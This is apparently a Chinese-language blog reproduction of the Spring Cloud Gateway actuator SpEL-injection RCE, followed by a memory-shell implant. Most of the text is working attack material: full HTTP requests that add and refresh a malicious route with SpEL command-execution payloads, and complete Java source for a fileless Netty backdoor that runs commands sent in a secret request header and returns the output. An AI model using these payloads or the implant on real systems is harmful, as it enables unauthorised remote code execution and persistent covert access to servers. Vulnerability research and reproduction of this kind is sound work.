Spring Cloud Gateway RCE+内存马

github地址https://github.com/spring-cloud/spring-cloud-gateway漏洞影响版本Spring Cloud Gateway < 3.1.1Spring Cloud Gateway < 3.0.7Spring Cloud Gateway 其他已不再更新的版本本地采用3.1.0复现漏洞poc（1）添加路由POST /actuator/gateway/routes/test HTTP/1.1Host: 127.0.0.1:9000Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 230
{  "id": "test",  "filters": [{    "name": "AddResponseHeader",    "args": {      "name": "Result",      "value": "#{new java.lang.ProcessBuilder("calc").start()}"    }  }],  "uri": "https://www.baidu.com"}（2）刷新路由POST /actuator/gateway/refresh HTTP/1.1Host: 127.0.0.1:9000Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 228

AbstractGatewayControllerEndpoint下断点RouteDefinition 路由的相关信息id 名称

动态调试获取存在的GatewayFiltersfor (int i = 0; i < this.GatewayFilters.toArray().length; i++) {    System.out.println(this.GatewayFilters.toArray()[i].name());}AddRequestHeaderMapRequestHeaderAddRequestParameterAddResponseHeaderModifyRequestBodyDedupeResponseHeaderModifyResponseBodyCacheRequestBodyPrefixPathPreserveHostHeaderRedirectToRemoveRequestHeaderRemoveRequestParameterRemoveResponseHeaderRewritePathRetrySetPathSecureHeadersSetRequestHeaderSetRequestHostHeaderSetResponseHeaderRewriteResponseHeaderRewriteLocationResponseHeaderSetStatusSaveSessionStripPrefixRequestHeaderToRequestUriRequestSizeRequestHeaderSize

{  "id": "test",  "filters": [{    "name": "AddResponseHeader",    "args": {      "name": "Result",      "value": "#{new java.lang.ProcessBuilder("calc").start()}"    }  }],  "uri": "https://www.baidu.com"}

getValue:60, ShortcutConfigurable (org.springframework.cloud.gateway.support)normalize:94, ShortcutConfigurable$ShortcutType$1 (org.springframework.cloud.gateway.support)normalizeProperties:140, ConfigurationService$ConfigurableBuilder (org.springframework.cloud.gateway.support)bind:241, ConfigurationService$AbstractBuilder (org.springframework.cloud.gateway.support)loadGatewayFilters:144, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)getFilters:176, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)convertToRoute:117, RouteDefinitionRouteLocator (org.springframework.cloud.gateway.route)apply:-1, RouteDefinitionRouteLocator$$Lambda$1019/0x0000000801183c30 (org.springframework.cloud.gateway.route)onApplicationEvent:81, CachingRouteLocator (org.springframework.cloud.gateway.route)onApplicationEvent:40, CachingRouteLocator (org.springframework.cloud.gateway.route)doInvokeListener:176, SimpleApplicationEventMulticaster (org.springframework.context.event)invokeListener:169, SimpleApplicationEventMulticaster (org.springframework.context.event)multicastEvent:143, SimpleApplicationEventMulticaster (org.springframework.context.event)publishEvent:421, AbstractApplicationContext (org.springframework.context.support)publishEvent:378, AbstractApplicationContext (org.springframework.context.support)refresh:96, AbstractGatewayControllerEndpoint (org.springframework.cloud.gateway.actuate)lambda$invoke$0:144, InvocableHandlerMethod (org.springframework.web.reactive.result.method)apply:-1, InvocableHandlerMethod$$Lambda$1138/0x0000000801202148 (org.springframework.web.reactive.result.method)

POST /actuator/gateway/refresh HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 329
{  "id": "hacktest",  "filters": [{    "name": "AddResponseHeader",    "args": {      "name": "Result",      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"    }  }],  "uri": "http://example.com"}

内存马参考https://mp.weixin.qq.com/s/S15erJhHQ4WCVfF0XxDYMg原理分析了重新发，这里就只记录一下步骤就行了。

（1）netty class转base64 全包类名（2）创建路由（3）刷新路由 执行命令

转base64代码byte[] readAllBytes = Files.readAllBytes(new File("C:\Users\yzc\Downloads\spring-cloud-gateway-3.1.0\spring-cloud-gateway-server\target\classes\tes.class").toPath());String imgStr = Base64Utils.encodeToString(readAllBytes);System.out.println(imgStr);

内存马代码，来源参考链接public  class tes extends io.netty.channel.ChannelDuplexHandler implements reactor.netty.ChannelPipelineConfigurer {  public static String doInject(){    String msg = "inject-start";    try {      java.lang.reflect.Method getThreads = Thread.class.getDeclaredMethod("getThreads");      getThreads.setAccessible(true);      Object threads = getThreads.invoke(null);
      for (int i = 0; i < java.lang.reflect.Array.getLength(threads); i++) {        Object thread = java.lang.reflect.Array.get(threads, i);        if (thread != null && thread.getClass().getName().contains("NettyWebServer")) {          java.lang.reflect.Field _val$disposableServer = thread.getClass().getDeclaredField("val$disposableServer");          _val$disposableServer.setAccessible(true);          Object val$disposableServer = _val$disposableServer.get(thread);          java.lang.reflect.Field _config = val$disposableServer.getClass().getSuperclass().getDeclaredField("config");          _config.setAccessible(true);          Object config = _config.get(val$disposableServer);          java.lang.reflect.Field _doOnChannelInit = config.getClass().getSuperclass().getSuperclass().getDeclaredField("doOnChannelInit");          _doOnChannelInit.setAccessible(true);          _doOnChannelInit.set(config, new tes());          msg = "inject-success";        }      }    }catch (Exception e){      msg = "inject-error";    }    return msg;  }
  @Override  public void onChannelInit(reactor.netty.ConnectionObserver connectionObserver, io.netty.channel.Channel channel, java.net.SocketAddress socketAddress) {    io.netty.channel.ChannelPipeline pipeline = channel.pipeline();    pipeline.addBefore("reactor.left.httpTrafficHandler","memshell_handler",new tes());  }

  @Override  public void channelRead(io.netty.channel.ChannelHandlerContext ctx, Object msg) throws Exception {    if(msg instanceof io.netty.handler.codec.http.HttpRequest){      io.netty.handler.codec.http.HttpRequest httpRequest = (io.netty.handler.codec.http.HttpRequest)msg;      try {        if(httpRequest.headers().contains("e0mlja")) {          if(httpRequest.headers().get("e0mlja").equals("e0mlja")) {            String cmd = httpRequest.headers().get("e0m");            String execResult = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A").next();            send(ctx, execResult, io.netty.handler.codec.http.HttpResponseStatus.OK);            return;          }        }      }catch (Exception e){        e.printStackTrace();      }    }    ctx.fireChannelRead(msg);  }

  private void send(io.netty.channel.ChannelHandlerContext ctx, String context, io.netty.handler.codec.http.HttpResponseStatus status) {    io.netty.handler.codec.http.FullHttpResponse response = new io.netty.handler.codec.http.DefaultFullHttpResponse(io.netty.handler.codec.http.HttpVersion.HTTP_1_1, status, io.netty.buffer.Unpooled.copiedBuffer(context, io.netty.util.CharsetUtil.UTF_8));    response.headers().set(io.grpc.netty.shaded.io.netty.handler.codec.http.HttpHeaderNames.CONTENT_TYPE, "text/plain; charset=UTF-8");    ctx.writeAndFlush(response).addListener(io.netty.channel.ChannelFutureListener.CLOSE);  }
  public static void main(String[] args) {
  }
}



还有一部分没有分析，比如除了filter还有predicates没有分析。